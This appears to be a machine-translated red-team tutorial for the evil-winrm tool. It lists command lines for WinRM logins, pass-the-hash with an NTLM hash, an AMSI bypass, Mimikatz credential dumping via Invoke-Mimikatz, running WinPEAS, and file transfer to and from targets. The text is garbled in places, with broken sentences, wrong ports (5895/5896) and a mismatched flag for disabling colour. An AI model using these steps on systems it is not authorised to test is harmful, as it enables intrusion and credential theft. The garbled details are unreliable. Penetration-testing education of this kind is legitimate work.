Title: Red Team Artifact-Evil-Winrm Detailed Guide

Foreword

Evil-winrm

The tool was originally developed by the Hackplayers team. The purpose of developing this tool is to simplify penetration testing as much as possible, especially in Microsoft Windows environments.

Evil-winrm uses PowerShell Remote Protocol (PSRP), and Windows Remote is often used by system and network administrators

Management protocol is uploaded and managed. WinRM is a firewall-friendly SOAP protocol that can be used via HTTP default port 5985

Used with HTTP transport. For more information about PowerShell remote processing, please refer to visit the official Microsoft website.

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.3

Introduction to Evil-winrm

Evil-winrm is an open source tool developed using the ruby language. The tool has many cool features, including remote login with a plain text password, SSL

Encrypted login, NTLM hash login, key login, file transfer, log storage and other functions. The author of this development tool is constantly updating the tool and maintaining updates for a long time. use

evil-winrm, we can get the PowerShell command terminal session of the remote host. The tool is integrated in Kali Linux systems, but if you want to download it separately, you can download it from its official git repository.

Download link: https: //github.com/Hackplayers/evil-winrm

Winrm Service Discovery

As mentioned above, if enabled in the remote host

Winrm service will be associated with the use of evil-winrm tool. In order to confirm whether the target system has enabled winrm service, we can use nmap to find two default winrm service ports 5895 and

5896 Whether it is turned on. From the nmap scan results, we found that the winrm service is enabled, so we can use the evil-winrm tool to log in and perform other tasks we will explore in the horizontal phase.

nmap -p 5985 , 5986 192.168 .1 .19

:

Evil-winrm help command help

To list all available features of evil-winrm, we can simply use the -h flag, which will list all the help commands with descriptions.

evil-winrm -h

Login with a plain text password

Suppose we obtained a plaintext password during the account enumeration phase and noticed that the remote host has enabled winrm service, we can use evil-winrm to perform remote sessions on the target system, using the target system IP address with the -i parameter, the target system username with the -u parameter, and the target system password with the -p parameter. As shown in the figure below, we can see that a remote PowerShell session has been established.

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987

Login with a plain text password - Enable SSL

As mentioned above, the winrm service can transport traffic over the HTTP protocol, and we can then use the Secure Sockets Layer (SSL) feature to ensure the connection is secure. Once SSL is enabled, our data will be transferred through an encrypted secure socket layer. Using evil-winrm, we can use the -S parameter to establish a command for secure transmission with the remote host.

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -S

Login with NTLM Hash - Attack by hash

Penetration or resolution of any intranet

In projects related to Windows permission escalation and Active Directory utilization, we often obtain NTLM hash values through various attack methods.

If we are in a Windows intranet environment, we can use evil-winrm to create PowerShell by performing a pass-through hash attack

session, so that you can use the hash as a password instead of using a plain text password for remote login. In addition, this attack supports other protocols. Passing a hash we can use the -H parameter.

evil-winrm -i 192.168.1.19 -u administrator -H 32196B56FFE6F45E294117B91A83BF38

Load Powershell script

Evil-winrm also provides a feature that allows us to use powershell scripts that come with the target host. The script can be loaded directly into memory, and we can use the relative path of the powershell script connected to the target system with the -s parameter. In addition, the tool provides the AMSI features we often need before importing any scripts. In the following example, we will bypass the AMSI function and call it directly from the system

The Invoke-Mimiktz.ps1 script is placed into the target host and loaded into memory. After that, you can use the mimikatz command. For demonstration purposes, we dumped the system login credentials directly from the cache. After dumping the credentials, we can again use the obtained NTLM hash for a hash pass attack.

https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -s /opt/privsc/powershell

Bypass-4MSI

Invoke-Mimikatz.ps1

Invoke-Mimikatz

Storing logs using Evil-winrm

This function means that after obtaining a remote session, the log of the execution command is saved to our local system. When we are working on projects, we need to attack credentials in order to perform subsequent reports and output. All logs can be saved to our host system using the -l parameter and saved to the /root/evil-winrm-logs directory by default. In the following example, we can use the ipconfig command at the same time and save the command output information to the host system.

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -l

You can verify whether the command log output is stored successfully by checking the saved log content. You can see that the log information output from our above command has been stored.

Disable remote full path function

By default, the tool comes with the remote full path feature, but if we want to disable the remote path full path feature, we can use the -N parameter in the command. It depends on whether the individual likes to turn the path full feature on or off, but if you are satisfied with the automatic full-path feature, you can feel free to use its default feature.

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -N

Disable color interface

Whenever we use evil-winrm to create any remote session, a beautiful colored command line interface is generated. Nevertheless, if we want to disable the color interface feature, we can also use the -n parameter to disable the feature when creating a session.

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -N

Run the executable file

This feature is designed to solve real-time problems and difficulties we encounter during evaluation while conducting a PowerShell session that we cannot put on the command line. In this case, we want to be able to run the exe executable in the evil-winrm session. Suppose we have an executable file to run in the target system.

The Hackplayers team once again designed the tool and added an additional feature to run all executables in an evil-winrm PowerShell session. Similarly, we can use the -e parameter to execute exe executable binary. In the following example, where the WinPEAS.exe executable is stored in the local computer /opt/privsc directory and runs it using the additional function (Invoke-Binary command in the evil-winrm menu). This feature allows us to execute any exe binary that runs in the command line shell.

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -e /opt/privsc

Bypass-4MSI

menu

Invoke-Binary /opt/privsc/winPEASx64.exe

Once we have set the executable path, we can use any executable that we want to run in the target system. In the following example, we call WinPEASx64.exe and run it into the target system using evil-winrm.

Use Evil-winrm for service query

Sometimes the post-penetration test tool cannot detect the service name running in the target system.

In this case, we can use evil-winrm to find the service name running in the target system. To do this, we can go to the menu again and use the service function.

It will list all services running the program host.

File transfer using Evil-winrm

There is no doubt that evil-winrm has done its best to make our use as simple as possible. We always need to transfer files from the attack machine to the remote machine to perform its command operations. And the evil-winrm tool provides a very practical feature, especially when we are facing outbound traffic rules set in the target system and when we use evil-winrm with the proxy. In the following example, we upload the notes.txt file in the /root directory to the target system.

The file is downloaded from the target system to the attacker's machine. Similarly, we can use the following command to download:

download notes.txt /root/raj/notes.txt

Using Evil-winrm from Docker

This tool can also be installed in

in docker. If we are installing into docker into evil-winrm, then we can also call it from docker.

It will run like it is in the main system. To do this, follow the docker syntax and the evil-winrm command to call it from docker.

docker run --rm -ti --name evil-winrm oscarakaelvis/evil-winrm -i 192.168.1.105 -u Administrator -p 'Ignite@987'

Login with Evil-winrm key

Evil-winrm also allows us to use public and private keys to establish remote sessions, use parameters with -k and private keys, and parameters with -c and public keys. In addition, we can also add the -S parameter to enable SSL to enable our connection to encrypt and secure.

evil-winrm -i 10.129.227.105 -c certificate.pem -k priv-key.pem -S